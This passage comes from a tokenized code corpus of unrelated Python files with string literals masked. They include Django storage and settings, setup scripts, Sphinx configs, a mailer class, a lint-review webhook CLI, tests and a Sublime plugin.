'<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . get_valid_name ( name , * args , ** kwargs ) <EOL> def get_available_name ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . get_available_name ( name , * args , ** kwargs ) <EOL> def path ( self , name , * args , ** kwargs ) : <EOL> return super ( TestStorageMixin , self ) . path ( name , * args , ** kwargs ) <EOL> def delete ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . delete ( name , * args , ** kwargs ) <EOL> def exists ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . 
exists ( name , * args , ** kwargs ) <EOL> def listdir ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . listdir ( name , * args , ** kwargs ) <EOL> def size ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . size ( name , * args , ** kwargs ) <EOL> def url ( self , name , * args , ** kwargs ) : <EOL> return super ( TestStorageMixin , self ) . url ( name , * args , ** kwargs ) <EOL> def accessed_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . accessed_time ( name , * args , ** kwargs ) <EOL> def created_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . created_time ( name , * args , ** kwargs ) <EOL> def modified_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . modified_time ( name , * args , ** kwargs ) <EOL> class TestStorage ( TestStorageMixin , FileSystemStorage ) : <EOL> pass </s>
<s> from __future__ import print_function <EOL> from builtins import str <EOL> from builtins import range <EOL> import pyGPs <EOL> from pyGPs . Validation import valid <EOL> import numpy as np <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> data_source = "<STR_LIT>" <EOL> x = [ ] <EOL> y = [ ] <EOL> with open ( data_source ) as f : <EOL> for index , line in enumerate ( f ) : <EOL> feature = line . split ( '<STR_LIT:U+002C>' ) <EOL> attr = feature [ : - <NUM_LIT:1> ] <EOL> attr = [ float ( i ) for i in attr ] <EOL> target = [ feature [ - <NUM_LIT:1> ] ] <EOL> x . append ( attr ) <EOL> y . append ( target ) <EOL> x = np . array ( x ) <EOL> y = np . array ( y ) <EOL> n , D = x . shape <EOL> for i in range ( n ) : <EOL> if y [ i , <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:g>' : <EOL> y [ i , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> else : <EOL> y [ i , <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> y = np . int8 ( y ) <EOL> K = <NUM_LIT:10> <EOL> ACC = [ ] <EOL> RMSE = [ ] <EOL> cv_run = <NUM_LIT:0> <EOL> for x_train , x_test , y_train , y_test in valid . k_fold_validation ( x , y , K ) : <EOL> print ( '<STR_LIT>' , cv_run ) <EOL> model = pyGPs . GPC ( ) <EOL> model . optimize ( x_train , y_train ) <EOL> ymu , ys2 , fmu , fs2 , lp = model . predict ( x_test , ys = y_test ) <EOL> ymu_class = np . sign ( ymu ) <EOL> acc = valid . ACC ( ymu_class , y_test ) <EOL> print ( '<STR_LIT>' , round ( acc , <NUM_LIT:2> ) ) <EOL> rmse = valid . RMSE ( ymu_class , y_test ) <EOL> print ( '<STR_LIT>' , round ( rmse , <NUM_LIT:2> ) ) <EOL> ACC . append ( acc ) <EOL> RMSE . append ( rmse ) <EOL> cv_run += <NUM_LIT:1> <EOL> print ( '<STR_LIT>' , np . round ( np . mean ( ACC ) , <NUM_LIT:2> ) , '<STR_LIT:(>' + str ( np . round ( np . std ( ACC ) , <NUM_LIT:2> ) ) + '<STR_LIT:)>' ) <EOL> print ( '<STR_LIT>' , np . round ( np . mean ( RMSE ) , <NUM_LIT:2> ) ) <EOL> '''<STR_LIT>''' <EOL> print ( '<STR_LIT>' ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> author_email = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATIC_ROOT = os . path . join ( BASE_DIR , '<STR_LIT>' ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> WEBPACK = { <EOL> '<STR_LIT>' : STATIC_ROOT , <EOL> '<STR_LIT>' : STATIC_URL , <EOL> '<STR_LIT>' : ( <EOL> os . path . join ( BASE_DIR , '<STR_LIT:..>' ) , <EOL> ) , <EOL> '<STR_LIT>' : DEBUG , <EOL> '<STR_LIT>' : DEBUG , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : DEBUG <EOL> } , <EOL> } </s>
<s> import sys <EOL> from django . template import Library <EOL> from optional_django import six <EOL> from . . compiler import webpack <EOL> from . . exceptions import BundlingError <EOL> register = Library ( ) <EOL> @ register . assignment_tag ( name = '<STR_LIT>' ) <EOL> def webpack_template_tag ( path_to_config ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return webpack ( path_to_config ) <EOL> except ( AttributeError , ValueError ) as e : <EOL> raise six . reraise ( BundlingError , BundlingError ( * e . args ) , sys . exc_info ( ) [ <NUM_LIT:2> ] ) </s>
<s> import argparse <EOL> import lintreview . github as github <EOL> import sys <EOL> from flask import url_for <EOL> from lintreview . web import app <EOL> def main ( ) : <EOL> parser = create_parser ( ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) <EOL> def register_hook ( args ) : <EOL> try : <EOL> process_hook ( github . register_hook , args ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( e . message + '<STR_LIT:\n>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def remove_hook ( args ) : <EOL> try : <EOL> process_hook ( github . unregister_hook , args ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( e . message + '<STR_LIT:\n>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def process_hook ( func , args ) : <EOL> """<STR_LIT>""" <EOL> credentials = None <EOL> if args . login_user and args . login_pass : <EOL> credentials = { <EOL> '<STR_LIT>' : args . login_user , <EOL> '<STR_LIT>' : args . login_pass <EOL> } <EOL> with app . app_context ( ) : <EOL> if credentials : <EOL> credentials [ '<STR_LIT>' ] = app . config [ '<STR_LIT>' ] <EOL> repo = github . get_repository ( <EOL> credentials , <EOL> args . user , <EOL> args . repo ) <EOL> else : <EOL> repo = github . get_repository ( <EOL> app . config , <EOL> args . user , <EOL> args . repo ) <EOL> endpoint = url_for ( '<STR_LIT>' , _external = True ) <EOL> func ( repo , endpoint ) <EOL> def create_parser ( ) : <EOL> desc = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = desc ) <EOL> commands = parser . add_subparsers ( <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" ) <EOL> desc = """<STR_LIT>""" <EOL> register = commands . add_parser ( '<STR_LIT>' , help = desc ) <EOL> register . 
add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> register . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> register . add_argument ( '<STR_LIT:user>' , <EOL> help = "<STR_LIT>" ) <EOL> register . add_argument ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> register . set_defaults ( func = register_hook ) <EOL> desc = """<STR_LIT>""" <EOL> remove = commands . add_parser ( '<STR_LIT>' , help = desc ) <EOL> remove . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> remove . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . add_argument ( '<STR_LIT:user>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . add_argument ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . set_defaults ( func = remove_hook ) <EOL> return parser <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from setuptools import setup , find_packages <EOL> PACKAGE_NAME = "<STR_LIT>" <EOL> VERSION = "<STR_LIT>" <EOL> requirements = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> setup ( <EOL> name = PACKAGE_NAME , <EOL> version = VERSION , <EOL> description = """<STR_LIT>""" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = requirements . readlines ( ) , <EOL> ) </s>
<s> import sys , os <EOL> docs_dir = os . path . dirname ( __file__ ) <EOL> project_dir = os . path . abspath ( os . path . join ( docs_dir , '<STR_LIT:..>' ) ) <EOL> print ( project_dir ) <EOL> sys . path . insert ( <NUM_LIT:1> , project_dir ) <EOL> import textblob_de <EOL> sys . path . pop ( <NUM_LIT:1> ) <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = release = textblob_de . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import pkg_resources <EOL> from email import charset <EOL> from functools import partial <EOL> from marrow . mailer . message import Message <EOL> from marrow . mailer . exc import MailerNotRunning <EOL> from marrow . util . compat import basestring <EOL> from marrow . util . bunch import Bunch <EOL> from marrow . util . object import load_object <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> log = __import__ ( '<STR_LIT>' ) . getLogger ( __name__ ) <EOL> class Mailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . Manager . __name__ , self . Transport . __name__ ) <EOL> def __init__ ( self , config , prefix = None ) : <EOL> self . manager , self . Manager = None , None <EOL> self . Transport = None <EOL> self . running = False <EOL> self . config = config = Bunch ( config ) <EOL> if prefix is not None : <EOL> self . config = config = Bunch . partial ( prefix , config ) <EOL> if '<STR_LIT>' in config and isinstance ( config . manager , dict ) : <EOL> self . manager_config = manager_config = config . manager <EOL> elif '<STR_LIT>' in config : <EOL> self . manager_config = manager_config = dict ( manager_config ) <EOL> else : <EOL> try : <EOL> self . manager_config = manager_config = Bunch . partial ( '<STR_LIT>' , config ) <EOL> except ValueError : <EOL> self . manager_config = manager_config = dict ( ) <EOL> if '<STR_LIT>' in config and isinstance ( config . manager , basestring ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> manager_config . use = config . manager <EOL> try : <EOL> if '<STR_LIT>' in config and isinstance ( config . transport , dict ) : <EOL> self . transport_config = transport_config = Bunch ( config . transport ) <EOL> else : <EOL> self . transport_config = transport_config = Bunch . partial ( '<STR_LIT>' , config ) <EOL> except ( AttributeError , ValueError ) : <EOL> self . 
transport_config = transport_config = Bunch ( ) <EOL> if '<STR_LIT>' in config and isinstance ( config . transport , basestring ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> transport_config . use = config . transport <EOL> try : <EOL> if '<STR_LIT:message>' in config and isinstance ( config . message , dict ) : <EOL> self . message_config = Bunch ( config . message ) <EOL> else : <EOL> self . message_config = Bunch . partial ( '<STR_LIT:message>' , config ) <EOL> except ( AttributeError , ValueError ) : <EOL> self . message_config = Bunch ( ) <EOL> self . Manager = Manager = self . _load ( manager_config . use if '<STR_LIT>' in manager_config else '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not Manager : <EOL> raise LookupError ( "<STR_LIT>" % ( config . manager , ) ) <EOL> self . Transport = Transport = self . _load ( transport_config . use , '<STR_LIT>' ) <EOL> if not Transport : <EOL> raise LookupError ( "<STR_LIT>" % ( config . transport , ) ) <EOL> self . manager = Manager ( manager_config , partial ( Transport , transport_config ) ) <EOL> @ staticmethod <EOL> def _load ( spec , group ) : <EOL> if not isinstance ( spec , basestring ) : <EOL> return spec <EOL> if '<STR_LIT::>' in spec : <EOL> return load_object ( spec ) <EOL> for entrypoint in pkg_resources . iter_entry_points ( group , spec ) : <EOL> return entrypoint . load ( ) <EOL> def start ( self ) : <EOL> if self . running : <EOL> log . warning ( "<STR_LIT>" ) <EOL> return <EOL> log . info ( "<STR_LIT>" ) <EOL> self . manager . startup ( ) <EOL> self . running = True <EOL> log . info ( "<STR_LIT>" ) <EOL> return self <EOL> def stop ( self ) : <EOL> if not self . running : <EOL> log . warning ( "<STR_LIT>" ) <EOL> return <EOL> log . info ( "<STR_LIT>" ) <EOL> self . manager . shutdown ( ) <EOL> self . running = False <EOL> log . info ( "<STR_LIT>" ) <EOL> return self <EOL> def send ( self , message ) : <EOL> if not self . running : <EOL> raise MailerNotRunning ( "<STR_LIT>" ) <EOL> log . 
info ( "<STR_LIT>" , message . id ) <EOL> try : <EOL> result = self . manager . deliver ( message ) <EOL> except : <EOL> log . error ( "<STR_LIT>" , message . id ) <EOL> raise <EOL> log . debug ( "<STR_LIT>" , message . id ) <EOL> return result <EOL> def new ( self , author = None , to = None , subject = None , ** kw ) : <EOL> data = dict ( self . message_config ) <EOL> data [ '<STR_LIT>' ] = self <EOL> if author : <EOL> kw [ '<STR_LIT>' ] = author <EOL> if to : <EOL> kw [ '<STR_LIT:to>' ] = to <EOL> if subject : <EOL> kw [ '<STR_LIT>' ] = subject <EOL> data . update ( kw ) <EOL> return Message ( ** data ) <EOL> class Delivery ( Mailer ) : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> super ( Delivery , self ) . __init__ ( * args , ** kw ) <EOL> charset . add_charset ( '<STR_LIT:utf-8>' , charset . SHORTEST , charset . QP , '<STR_LIT:utf-8>' ) <EOL> charset . add_charset ( '<STR_LIT:utf8>' , charset . SHORTEST , charset . QP , '<STR_LIT:utf8>' ) </s>
<s> '''<STR_LIT>''' </s>
<s> from __future__ import unicode_literals <EOL> import sys <EOL> from contextlib import contextmanager <EOL> from tempfile import TemporaryFile <EOL> try : <EOL> from io import StringIO <EOL> except ImportError : <EOL> from cStringIO import StringIO <EOL> @ contextmanager <EOL> def capture ( ) : <EOL> old_stdout = sys . stdout <EOL> with StringIO ( ) as tmp : <EOL> sys . stdout = tmp <EOL> try : <EOL> yield tmp <EOL> finally : <EOL> sys . stdout = old_stdout </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import flask_marshmallow <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } <EOL> primary_domain = '<STR_LIT>' <EOL> default_role = '<STR_LIT>' <EOL> issues_github_path = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = release = flask_marshmallow . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> '<STR_LIT:index>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> htmlhelp_basename = '<STR_LIT>' </s>
<s> import re <EOL> from setuptools import setup , find_packages <EOL> EXTRA_REQUIREMENTS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def find_version ( fname ) : <EOL> """<STR_LIT>""" <EOL> version = '<STR_LIT>' <EOL> with open ( fname , '<STR_LIT:r>' ) as fp : <EOL> reg = re . compile ( r'<STR_LIT>' ) <EOL> for line in fp : <EOL> m = reg . match ( line ) <EOL> if m : <EOL> version = m . group ( <NUM_LIT:1> ) <EOL> break <EOL> if not version : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return version <EOL> __version__ = find_version ( "<STR_LIT>" ) <EOL> def read ( fname ) : <EOL> with open ( fname ) as fp : <EOL> content = fp . read ( ) <EOL> return content <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> include_package_data = True , <EOL> extras_require = { '<STR_LIT>' : EXTRA_REQUIREMENTS } , <EOL> license = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> keywords = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) ) <EOL> def downgrade ( ) : <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import unittest <EOL> from osm_time import get_minutes_from_midnight , clean_value , ParseException <EOL> from osm_time . opening_hours import OpeningHours <EOL> class TestHelpers ( unittest . TestCase ) : <EOL> def test_get_minutes_from_midnight ( self ) : <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def test_clean_value ( self ) : <EOL> self . assertEqual ( clean_value ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def test_parse_exception ( self ) : <EOL> self . assertRaises ( ParseException , OpeningHours , "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> try : <EOL> from . helper import H <EOL> except : <EOL> from helper import H <EOL> try : <EOL> from . import settings as S <EOL> except : <EOL> import settings as S <EOL> try : <EOL> from . import view as V <EOL> except : <EOL> import view as V <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:H>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:S>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> from . import BaseResource <EOL> class Buildpack ( BaseResource ) : <EOL> _strs = [ '<STR_LIT:url>' ] <EOL> _pks = [ '<STR_LIT:url>' ] <EOL> def __init__ ( self ) : <EOL> super ( Buildpack , self ) . __init__ ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . url ) </s>
<s> import sublime , sublime_plugin <EOL> class PareditPushBracketCommand ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> print '<STR_LIT>' + '<STR_LIT>' <EOL> for region in self . view . sel ( ) : <EOL> pos = self . view . sel ( ) [ <NUM_LIT:0> ] . begin ( ) <EOL> first_closing = None <EOL> first = True <EOL> def search ( openings , pos , first_closing , first ) : <EOL> print "<STR_LIT>" + str ( pos ) + "<STR_LIT:)>" <EOL> quit = <NUM_LIT:0> <EOL> while quit < <NUM_LIT:50> : <EOL> next_opening = self . view . find ( '<STR_LIT>' , pos ) <EOL> print "<STR_LIT>" + str ( next_opening ) <EOL> next_closing = self . view . find ( '<STR_LIT>' , pos ) <EOL> print "<STR_LIT>" + str ( next_closing ) <EOL> if ( next_opening == None ) and ( next_closing == None ) : <EOL> print '<STR_LIT>' <EOL> break <EOL> if ( next_opening != None ) and ( next_opening . begin ( ) < next_closing . begin ( ) ) : <EOL> openings += <NUM_LIT:1> <EOL> pos = next_opening . begin ( ) + <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( openings ) <EOL> else : <EOL> if ( first_closing == None and openings == <NUM_LIT:0> ) or ( first_closing == None and first == True ) : <EOL> print '<STR_LIT>' <EOL> first_closing = next_closing <EOL> dont_break = True <EOL> else : <EOL> dont_break = False <EOL> if openings - <NUM_LIT:1> >= <NUM_LIT:0> : <EOL> openings -= <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( openings ) <EOL> else : <EOL> dont_break = True <EOL> print '<STR_LIT>' + str ( openings ) <EOL> pos = next_closing . 
begin ( ) + <NUM_LIT:1> <EOL> quit += <NUM_LIT:1> <EOL> if openings == <NUM_LIT:0> and dont_break == False : <EOL> print '<STR_LIT>' <EOL> break <EOL> first = False <EOL> if first_closing == None : <EOL> print '<STR_LIT>' <EOL> first_closing = next_closing <EOL> openings , pos , first_closing , next_closing , first = search ( <NUM_LIT:0> , pos , first_closing , first ) <EOL> return openings , pos , first_closing , next_closing , first <EOL> openings , pos , first_closing , next_closing , first = search ( <NUM_LIT:1> , pos , first_closing , first ) <EOL> print "<STR_LIT>" + str ( first_closing ) <EOL> print "<STR_LIT>" + str ( next_closing ) <EOL> if ( first_closing != None ) and ( next_closing != None ) : <EOL> self . view . erase ( edit , first_closing ) <EOL> self . view . insert ( edit , next_closing . begin ( ) , '<STR_LIT:)>' ) <EOL> else : <EOL> print '<STR_LIT>' </s>
<s> from optparse import make_option <EOL> from django . core . management . base import BaseCommand <EOL> from planet . tasks import process_feed <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ) <EOL> def handle ( self , * args , ** options ) : <EOL> if not len ( args ) : <EOL> self . stderr . write ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:0> ) <EOL> feed_url = args [ <NUM_LIT:0> ] <EOL> process_feed . delay ( feed_url , create = True , category_title = options [ '<STR_LIT>' ] ) <EOL> self . stdout . write ( "<STR_LIT>" ) </s>
<s> from django . core . urlresolvers import reverse , reverse_lazy <EOL> from django . forms import ValidationError <EOL> from django . http import HttpResponseRedirect <EOL> from django . shortcuts import render_to_response , get_object_or_404 , redirect <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . generic import ListView <EOL> from django . views . generic . detail import SingleObjectMixin <EOL> from django . views . generic . edit import CreateView , DeleteView <EOL> from django . http import Http404 <EOL> from planet . models import Blog , Feed , Author , Post <EOL> from planet . forms import SearchForm <EOL> from tagging . models import Tag , TaggedItem <EOL> def index ( request ) : <EOL> posts = Post . site_objects . all ( ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def blogs_list ( request ) : <EOL> blogs_list = Blog . site_objects . all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blogs_list } , context_instance = RequestContext ( request ) ) <EOL> def blog_detail ( request , blog_id , slug = None ) : <EOL> blog = get_object_or_404 ( Blog , pk = blog_id ) <EOL> if slug is None : <EOL> return redirect ( blog , permanent = True ) <EOL> posts = Post . site_objects . filter ( feed__blog = blog ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blog , "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def feeds_list ( request ) : <EOL> feeds_list = 